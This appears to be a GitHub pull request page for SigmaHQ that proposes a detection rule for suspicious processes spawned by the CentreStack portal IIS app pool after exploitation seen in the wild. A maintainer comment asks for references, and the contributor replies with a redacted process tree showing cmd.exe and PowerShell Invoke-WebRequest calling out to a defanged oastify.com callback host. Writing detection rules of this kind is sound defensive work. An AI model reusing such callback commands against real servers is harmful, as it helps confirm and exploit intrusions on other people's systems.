Skip to content

new: Suspicious Process Spawn by CentreStack Portal AppPool #5263

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 5 commits into
base: master
Choose a base branch
from

Conversation

RG9n
Copy link
Contributor

@RG9n RG9n commented Apr 11, 2025

Summary of the Pull Request

We have observed exploitation of this in the wild today. This rule was crafted based on that exploitation.

Changelog

new: Suspicious Process Spawn by CentreStack Portal AppPool

Example Log Event

We haven't seen any false positives yet, for redaction reasons cannot share the log execution that came after here.

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Apr 11, 2025
@frack113 frack113 added the Work In Progress Some changes are needed label Apr 12, 2025
@frack113
Copy link
Member

frack113 commented Apr 12, 2025

Hi,
Can you give some references and a "redacted" log ?
Thanks

@RG9n
Copy link
Contributor Author

RG9n commented Apr 13, 2025

Hello @frack113 , here is a redacted log:
|----w3wp.exe IIS APPPOOL\portal 15100 w3wp.exe -ap "portal" -v "v4.0" -l "webengine4.dll" -a \.\pipe\redact -h "C:\inetpub\temp\apppools\portal\portal.config" -w "" -m
| |----cmd.exe IIS APPPOOL\portal 14784 cmd.exe /c powershell.exe Invoke-WebRequest -Uri hxxp[://]redact[.]oastify[.]com/redact
| |----powershell.exe IIS APPPOOL\portal 1240 powershell.exe Invoke-WebRequest -Uri hxxp[://]redacted[.]oastify[.]com/redact
| |----conhost.exe IIS APPPOOL\portal 6604 conhost.exe 0xffffffff -ForceV1

RG9n added 2 commits April 14, 2025 12:13
changes recommended by frack113, added Parent in front of parent image and commanline
added some references and small fp update
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Rules Windows Pull request add/update windows related rules Work In Progress Some changes are needed
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants